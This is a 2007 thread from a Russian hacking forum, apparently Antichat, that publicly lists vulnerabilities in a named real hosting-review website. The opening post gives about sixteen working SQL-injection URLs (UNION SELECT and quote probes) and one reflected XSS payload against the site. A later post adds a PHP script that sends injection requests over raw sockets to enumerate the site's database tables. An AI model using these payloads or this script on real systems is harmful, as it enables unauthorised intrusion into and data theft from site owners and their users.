Уязвимочти hostobzor.ru ( Дубль 2 )

Discussion in 'Уязвимости' started by Sharky, 13 Jan 2007.

  1. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    Вот опять вам на обзор :
    http://www.hostobzor.ru/db/news.php?id=666
    http://www.hostobzor.ru/db/resell.php?pid=-1+UNION+SELECT+CHAR(48,49,50,51,52,53,54,55,56,57,58,59,60),2,999/*
    http://www.hostobzor.ru/db/list_news_prov.php?pid=12%27
    http://www.hostobzor.ru/db/domen.php?pid=-372+UNION+SELECT+1,2,3/*
    http://www.hostobzor.ru/db/vds.php?pid=-1+union+select+1,2,3/*
    http://www.hostobzor.ru/db/vds.php?pid=-1%27
    http://www.hostobzor.ru/db/hosting.php?pid=-1%27
    http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
    http://www.hostobzor.ru/db/resell.php?pid=266%27
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=611%27
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153%27&id=611
    http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    http://www.hostobzor.ru/db/domen.php?pid=-1%27
    http://www.hostobzor.ru/db/adm_op.php
    http://www.hostobzor.ru/db/hosting.php?pid=392+and(1=3)+UNION+SELECT+1,2,3/*
    Вот опять та же xss-ка
    http://hostobzor.ru/db/list_col.php?dc=%3Cscript%3Ealert(666)%3C/script%3E

    Если не жалко дайте +
     
    #1 Sharky, 13 Jan 2007
    3 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    отпостил аж в двух темах =)
    поставлю тебе +
     
    #2 Spyder, 13 Jan 2007
  3. Ded.MCz

    Ded.MCz Member

    Joined:
    16 Jan 2006
    Messages:
    18
    Likes Received:
    19
    Reputations:
    36
    хэк

    PHP:
    <?
    echo     "<pre>";
    //http://www.hostobzor.ru/db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+limit+90,1/*
    for($i=0;$i<90;$i++)
    {
    $port 80;
    $address gethostbyname ('www.hostobzor.ru');
    $socket socket_create (AF_INETSOCK_STREAMSOL_TCP);
    socket_connect($socket$address$port);
    socket_write($socket"GET /db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+limit+$i,1/* HTTP/1.0\n\n");
    $result "";
    $result=socket_read($socket455);//340
    $result=substr_replace($resultNULL0315);//303
    $patern "#<[\s]*title[\s]*>([^<]*)<[\s]*/title[\s]*>#i";
    if(    preg_match($patern$result$rez)) echo "\n".str_replace(" - виртуальный выделенный сервер | Хостинг Обзор - эпицентр русскоязычного хостинга"null$rez[1]);
    else echo     "\n"."траблы с ID $i";
    socket_close ($socket);
    }
    echo     "\n</pre>";
    //copyright by lamarez))
    ?>

     
    #3 Ded.MCz, 14 Jan 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.